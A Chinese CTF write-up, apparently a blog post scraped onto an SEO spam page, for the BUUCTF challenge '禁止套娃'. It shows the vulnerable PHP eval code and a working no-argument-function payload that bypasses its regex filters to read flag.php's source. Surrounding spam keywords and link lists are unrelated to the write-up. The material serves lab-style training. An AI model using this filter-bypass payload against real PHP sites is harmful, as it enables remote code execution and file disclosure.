当前位置: 首页 > wzjs >正文

做go kegg的在线网站外贸是做什么的

做go kegg的在线网站,外贸是做什么的,自己做的网站 打开了没有图片,微信公众平台登录方法BUUCTF——禁止套娃 进入靶场 一个近乎空白的页面 看一下框架 没什么有用的信息&#xff0c;扫个目录吧 只扫出来给flag.php&#xff0c;但是0B&#xff0c;估计又是个空网站 拼接访问一下 果然又是什么都没有 没有突破口 githack找找看看也没有源码吧 <?php include …

BUUCTF——禁止套娃

进入靶场

在这里插入图片描述

一个近乎空白的页面

看一下框架

在这里插入图片描述

没什么有用的信息,扫个目录吧

在这里插入图片描述

只扫出来给flag.php,但是0B,估计又是个空网站

拼接访问一下

在这里插入图片描述

果然又是什么都没有

没有突破口

githack找找看看也没有源码吧

在这里插入图片描述

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){ //get传参expif (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {//过滤伪协议if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {//过滤关键字// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>

根据这段代码构造payload

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

在这里插入图片描述

拿到flag

flag{510faf28-0e0f-400d-aa4d-c88c74df6cde}

下播!

在这里插入图片描述

http://www.dtcms.com/wzjs/81507.html

相关文章:

  • 网站做游客留言做上海关键词优化外包
  • 东莞住房建设网站的网上海搜索引擎推广公司
  • 外国人做中国数学视频网站谷歌优化方法
  • 企业成本解决方案成都seo整站
  • 汇赢网站建设360网站推广官网
  • 佛山网站建设公司哪家性价比高seo优化有百度系和什么
  • 网站域名商代理商怎么查网站是不是正规
  • 江苏优化网站价格杭州网站排名seo
  • 深圳做网站推广公司windows优化大师怎么彻底删除
  • 西安做网站比较好的公司网络广告四个特征
  • 如何在局域网上做网站宁波seo外包服务商
  • 网站后台关键词链接怎样做查排名
  • 商城网站开发需要哪些人员电商卖货平台有哪些
  • 知识网站域名停靠网页app推广大全
  • 导航网址网站怎么做seosem是指什么意思
  • 医院网站制作广告策划书
  • 网站域名选择的原则安卓优化大师最新版下载
  • 自己做的网站别人免费网站推广软文发布
  • 一手房哪个网站做信息效果好石家庄做网站推广排名的公司
  • 企业建设网站公司深圳外贸推广公司
  • wordpress域名解析西安seo网站管理
  • 那些网站反爬做的好网络营销ppt怎么做
  • 郑州专业的网站建设全球搜官网
  • 石家庄城乡建设网站北京网
  • 网站怎么找的软文撰写案例
  • 如何做英文网站的外链网络优化
  • 网站的建设技术有哪些近日发生的重大新闻
  • 哈尔滨市香坊区建设局网站seo精准培训课程
  • 搜索引擎作弊的网站有哪些北京seo公司公司
  • 旅游网站制作方案朋友圈软文